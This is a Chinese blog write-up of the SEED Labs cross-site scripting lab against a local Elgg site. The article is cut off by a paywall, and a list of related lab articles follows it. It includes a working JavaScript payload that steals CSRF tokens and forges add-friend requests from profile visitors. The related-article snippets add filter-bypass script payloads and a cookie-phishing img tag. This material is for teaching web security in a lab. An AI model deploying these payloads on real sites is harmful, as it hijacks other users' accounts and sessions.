Cross-Site Scripting Attack Lab (Elgg)

最新推荐文章于 2024-01-14 11:18:41 发布
最新推荐文章于 2024-01-14 11:18:41 发布
阅读量767 收藏
点赞数
分类专栏: Seed Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39249347/article/details/107287979
版权
本文通过一个Elgg平台的XSS攻击实验,详细介绍了如何利用XSS攻击成为他人好友、修改他人主页以及实现自我传播的蠕虫代码。实验涉及添加好友请求的构造、个人资料编辑参数的获取以及不同传播方式的实现,揭示了XSS攻击的原理和危害。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

实验准备

  1. Ubuntu16.04
  2. 将网站www.xsslabelgg.com映射到IP地址127.0.0.1,填写在/etc/hosts文件里,同时需要修改Apache服务器配置文件/etc/apache2/sites-available/000-default.conf,以使得Apache服务器可以识别该站点。
  3. 在Elgg服务器创建几个用户:
    |账号|密码|
    |admin|seedadmin|
    |alice|seedalice|
    |boby|seedboby|
    |charlie|seedcharlie|
    |samy|seedsamy|

预备知识

  • 许多网络应用程序允许用户之间共享信息,一个用户的输入可以被其他人浏览,如果浏览的只是数据,那么没有太大的风险,然而,恶意用户可能会在数据中放入Javascript代码,如果一个网络应用程序没有将代码过滤掉,这段代码就可以到达其他用户的浏览器并执行,这被称为跨站脚本攻击。

开始实验

  1. 通过XSS攻击成为Samy的好友
  • 对于添加好友我们需要知道到底应该发送什么样的请求。
  • 我们用Charlie账户登陆,浏览Samy账户并添加其为自己的好友,同时使用火狐浏览器的HTTP Header Live拓展工具或Google浏览器的开发者工具来捕捉加好友的请求:
    http://www.xsslabelgg.com/action/friends/add?friend=47                  #1
&__elgg_ts=1594434277&__elgg_token=nWtT6nRoeg-vbVwymcShzQ      #2
...
Cookie:Elgg=v7jldvjfssch28pvt06605ojl4                                  #3
    行1:这是Elgg添加好友请求的URL,在请求中,需要设置目标URL为http://www.xsslabelgg.com/action/friends/add,除此之外,添加好友请求需要指明要添加的用户。
    行2:在URL中有两个额外的参数:__elgg_ts 和 __elgg_token,这个两个参数是为了防范CSRF攻击的对策,在CSRF攻击中关闭了它,但在XSS攻击中又重新打开了它,因此必须正确设置这两个值,否则它就会被视为跨站请求而被丢弃。
    行3:这是会话cookie,没有它,Elgg会丢弃请求,这个值浏览器会自动设置,攻击者无需担心。
  • _elgg_ts、__elgg_token这两个参数的值分别可以通过elgg.security.token.__elgg_ts和elgg.security.token.__elgg_token这两个Javascript变量获得。
  • 构造添加好友请求代码:
    <script type="text/javascript">
	window.onload = function()
	{
     
		var ts = "&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token = "&__elgg_token="+elgg.security.token.__elgg_token;
		var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=47"+token+ts;
		Ajax = new XMLHttpRequest();
		Ajax.open("GET",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
		Ajax.send();
	}
</script>
  • 恶意代码构造完毕后,把它放到Samy的个人主页,当有用户访问Samy的个人主页时,这段代码就会在用户的浏览器内执行,用户的个人主页有几个区域,这里选择about me区域,这个区域编辑器的默认模式支持格式化文本,编辑器会向文本添加格式数据,这些添加的数据会导致Javascript代码出现问题,为了防止编辑器添加数据,可以单击该区域右上角的Edit HTML按钮来切换到明文模式。
    在这里插入图片描述
  • 现在使用Alice账户登录,浏览Samy账户,可以看到Alice已经添加Samy为好友,因为此时页面上显示的时Remove Friend。
    在这里插入图片描述
    在这里插入图片描述
  1. 使用XSS攻击修改他人主页。
  • 将添加“Samy is my hero”这句话到所有浏览了他主页的用户的网页中,首先我们需要知道编辑个人资料服务所需要的参数。
    Request UR
最低0.47元/天 解锁文章
(SEED-LabCross-Site Scripting (XSS) Attack Lab跨站脚本攻击实验
lunan的博客
02-02 6168
(SEED-LabCross-Site Scripting (XSS) Attack Lab 跨站脚本攻击实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 The Elgg Web Application2.2 DNS Confifiguration2.3 Apache Confifiguration3 Lab Tasks3.1 Preparation: Getting Familiar w
【Seed-Labs 2.0】Cross-Site Scripting (XSS) Attack Lab (Web Application: Elgg)
AustinCyy的博客
01-03 1334
跨站脚本 (XSS) 是网络应用程序中常见的一种漏洞。攻击者可利用该漏洞向受害者的网络浏览器注入恶意代码(如 JavaScript 程序)。利用这些恶意代码,攻击者可以窃取受害者的凭证,如会话 cookie。利用 XSS 漏洞可绕过浏览器为保护这些凭证而采用的访问控制策略(即同一来源策略)。
Cross-Site Scripting (XSS) Attack Lab (Web Application: Elgg)——山东大学网络攻防实验
我有一颗五角星
05-22 7581
跨站点脚本(XSS)是通常在Web应用程序中发现的一种计算机安全漏洞。此漏洞可使攻击者将恶意代码(例如JavaScript)插入受害者的Web浏览器。使用这种恶意代码,攻击者可以窃取受害者的凭据,如Cookie。可以通过利用XSS漏洞来绕过浏览器用于保护这些凭据的访问控制策略(即,同源策略)。这类漏洞已经被利用来制作强大的网络钓鱼攻击和浏览器攻击。 为了展示利用XSS漏洞攻击者可以做什么,我们在预制的Ubuntu VM映像中设置了名为Elgg的Web应用程序。Elgg是社交网络非常受欢迎的开源Web应用程序
信息安全 SEED Lab8 Cross-Site Scripting (XSS) Attack Lab
crazyliu的博客
06-12 5367
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到网站,这里先配置一下。 网站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.xsslabelgg.com 网站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配置一下网站主目录,内容如下: <VirtualHost *:80> .
【SEED Labs 2.0】Cross-Site Scripting Attack Lab
Chenyang的博客
08-25 6669
本文为 SEED Labs 2.0 - Cross-Site Scripting Attack Lab 的实验记录。 实验原理 跨站脚本攻击是指恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页之时,嵌入其中 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。xss 漏洞通常是通过 php 的输出函数将 javascript 代码输出到 html 页面中,通过用户本地浏览器执行的,所以 xss 漏洞关键就是寻找参数未过滤的输出函数。 Task 1: Posting
Cross-Site Scripting (XSS) Attack Lab网安实验
l4kjih3gfe2dcba1的博客
07-18 2105
Cross-Site Scripting (XSS) Attack Lab网安实验 Lab Environment the Apache server needs to be started. $ sudo service apache2 start 3.2 Task 1: Posting a Malicious Message to Display an Alert Window description有<p>标签,不会执行<script>代码内容。可以将恶意代码放入brief
【网络攻防技术】XSS攻击手实验——Cross-Site Scripting (XSS) Attack Lab
omniscience的博客
11-13 1707
可以利用www.example60.com,image_www文件夹下的apache_csp.conf文件有这些网站的根目录信息,可以把代码保存在www.example60.com,让代码调用这个网站的JavaScript代码。self表示只允许从同一域名加载资源,*.example.com表示只允许加载该域名的子域名的资源,unsafe-inline允许内联脚本(一般指script标签的JS代码)、onclick等的执行。此任务的目标是发布一条包含JavaScript的恶意消息,以显示一个警报窗口。
漏洞分析Cross-Site Scripting (XSS) Attack Lab(自用、记录)
weixin_48392428的博客
05-24 1605
Cross-Site Scripting [XSS] Attack Lab1 Overview2 Lab Environment2.1 Starting the Apache Server2.2 The phpBB Web Application2.3 Configuring DNS2.4 Configuring Apache Server2.5 Other software3 Lab Tasks3.1 Task 1: Posting a Malicious Message to Display an Al
cross site scripting attack
Leove的专栏
10-12 635
cross site scripting attack http://www.cert.org/advisories/CA-2000-02.html
跨站脚本攻击 xss_跨站脚本攻击(XSS)
culi3118的博客
08-11 921
跨站脚本攻击 xssA cross-site scripting attack is one of the top 5 security attacks carried out on a daily basis across the Internet, and your PHP scripts may not be immune. 跨站点脚本攻击是每天在Internet上进行的前五项安全攻击之一...
Elgg(开源SNS) v3.0.1
10-02
Elgg(开源SNS)是一款开源的社交网络系统(php/mysql),以BLOG为中心实现社会网络化,一经问世,即好评如潮,更有人将其与大名鼎鼎的moodle相提并论。Elgg(开源SNS)平台不仅获得了2007年最
Elgg(开源SNS) v2.3.13 LTS Release.zip
07-07
Elgg(开源SNS)简介 Elgg是一款免费开源的社交网络系统(php/mysql),以BLOG为中心实现社会网络化,一经问世,即好评如潮,更有人将其与大名鼎鼎的moodle相提并论。这个平台不仅获得了2007年最佳社会性网络开源CMS平台的荣誉,更得到了info world的最高评价。   Elgg(开源SNS)页面截图展示 相关阅读 同类推荐:开源社区系统
SharePoint Security系列 之一 Cross-Site Scripting (XSS) Attack
weixin_34407348的博客
10-18 131
什么是Cross-Site Scripting Attack? =================== 攻击者制造一个网站, 受害用户访问该网站后, 其浏览器客户端收到恶意的脚本代码. 受害用户的浏览器之后会运行该脚本代码. 由于浏览器是从一个trusted site下载的脚本, 从而浏览器不可能识别这个代码是否合法, 并且Microsoft IE Security Zone也不能提供保护. ...
XSS Attack Examples (Cross-Site Scripting Attacks)
天元喜羊羊的博客
06-22 2161
http://www.thegeekstuff.com/2012/02/xss-attack-examples/ In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a differ
Cross-Site Scripting(XSS)简介
weixin_30784945的博客
07-13 340
  最近才开始研究HTML以及安全问题。如果有什么说得不对的地方,望请指出。   在网络应用安全中,XSS可能是最常见,范围最大,所包含攻击方法最多,同时也是最难以理解的一种攻击。在OWASP所列出的十大网络应用安全风险中,其排名第二位,仅次于SQL Injection。   而在本篇文章中,我们将一步一步深入挖掘XSS的攻击流程,攻击手段,以及防御方法等各个方面。 XSS示...
SeedLab——Cross-Site Scripting (XSS) Attack Lab
Aft3rGl0w的博客
01-14 2600
CSP通过指定允许加载和执行的内容源和资源,限制了浏览器中可以执行的代码。JavaScript可以操作cookie,因此当一个页面存在xss漏洞时,攻击者嵌入的恶意代码就能够完成截获所有访问该页面的cookie,然后将cookie发送给攻击者的服务器的行为,这样攻击者就能使用cookie冒充这些用户的身份了。cookie是存储在客户端的一些键值数据,它用于跟踪和存储有关用户状态、会话和身份验证,因此cookie是浏览器客户端的十分敏感的数据,如果cookie被泄露,就会造成敏感信息的泄露、用户身份的冒用。
xss介绍
songxiaomianbao的博客
08-24 939
详情介绍: XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容...
漏洞挖掘——实验12 Cross-Site Scripting (XSS) Attack Lab
一半西瓜的博客
04-17 3539
题目 Lab Cross-Site Scripting (XSS) Attack Lab Pre 1、名词解释:double free,UAF (Use After Free),RELRO(Relocation Read Only), Dangling pointer,Control Flow Guard 2、阅读下面这三篇文章: UAF学习--原理及利用 https://www.cnb...
信息安全 SEED Lab8 Cross-Site Request Forgery (CSRF) Attack Lab
crazyliu的博客
06-08 3270
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到两个网站,这里先配置一下。 两个网站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.csrflabelgg.com 127.0.0.1 www.csrflabattacker.com 网站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配.
Cross-Site Scripting pikachu
最新发布
03-24
### 关于 Pikachu 项目中的 XSS 漏洞 #### 跨站脚本攻击(XSS) 跨站脚本攻击是一种常见的安全漏洞,允许攻击者通过注入恶意脚本来执行未经授权的操作。这种攻击通常发生在 Web 应用程序未能正确验证或转义用户输入的情况下。 在 Pikachu 项目的上下文中,存在多个演示场景来展示 XSS 的工作原理及其潜在危害[^1]。 #### 登录页面的 XSS 风险 受害者可以通过访问 `http://127.0.0.1/pikachu/vul/xss/xsspost/post_login.php` 页面并使用默认凭证 (`test/abc123`) 进行登录操作。此页面可能未对用户的输入进行充分过滤,从而导致反射型或存储型 XSS 攻击的发生。 #### 利用图片标签触发 XSS 另一个典型的例子涉及 `<img>` 标签的滥用。例如,在某些情况下,可以利用如下 HTML 片段发起请求到指定服务器以窃取会话信息或其他敏感数据: ```html <img src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php" /> ``` 上述代码片段展示了如何通过图像加载机制实现远程通信的目的[^2]。 #### 大小写绕过的技巧 为了测试应用程序的安全防护措施是否存在缺陷,研究者们经常尝试不同的方法规避检测规则。比如下面这个案例就说明了即使简单的字符转换也可能突破初步防御屏障: ```html <SCRIPT>alert(/xss/)</sCRIpt> ``` 这里故意改变了部分字母的大写形式试图迷惑模式匹配算法达到成功弹窗的效果[^3]。 #### 嵌套 script 标记造成破坏 更进一步地考虑实际应用环境下的复杂情况,则有这样一种构造方式能够有效避开一些基础级别的HTML净化处理逻辑: ```html </script><script> alert('xss')</script> ``` 它巧妙地关闭当前正在解析状态中的 JavaScript 区域然后再开启新的定义区域以便执行自定义命令序列[^4]。 ### 结论 综上所述,Pikachu 提供了一个很好的平台让我们深入理解各种类型的Web安全性议题,特别是针对像XSS这样的经典威胁进行了详尽的实际演练.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值